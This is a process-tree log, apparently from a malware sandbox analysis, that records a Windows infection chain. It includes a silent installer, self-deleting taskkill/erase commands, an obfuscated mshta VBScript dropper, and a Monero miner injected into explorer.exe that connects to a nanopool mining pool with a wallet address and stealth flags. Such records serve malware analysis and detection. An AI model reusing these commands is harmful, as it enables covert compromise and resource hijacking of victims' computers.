C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f5d51697d04.exe"C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f5d51697d04.exe" /SILENT3⤵PID:2420
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-IC50E.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-IC50E.tmp\Sun03f5d51697d04.tmp" /SL5="$40158,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f5d51697d04.exe" /SILENT1⤵PID:2484
-
C:\Users\Admin\AppData\Local\Temp\is-PBFQH.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-PBFQH.tmp\postback.exe" ss12⤵PID:2800
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun033e271e0ce96c08.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun033e271e0ce96c08.exe" & exit1⤵PID:2764
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun033e271e0ce96c08.exe" /f2⤵
- Kills process with taskkill
PID:2824
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E656C51C-A970-488B-A574-858013077291} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]1⤵PID:2052
-
C:\Users\Admin\AppData\Roaming\ifsdjesC:\Users\Admin\AppData\Roaming\ifsdjes2⤵PID:1112
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2536 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1744
-
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe1⤵PID:432
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"2⤵PID:2488
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵PID:2672
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"4⤵PID:2828
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth3⤵PID:2652
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2784
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\8076700.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\8076700.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )1⤵PID:2832
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\8076700.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\8076700.exe") do taskkill /im "%~nxT" /f2⤵PID:2368
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "8076700.exe" /f3⤵
- Kills process with taskkill
PID:3044
-
-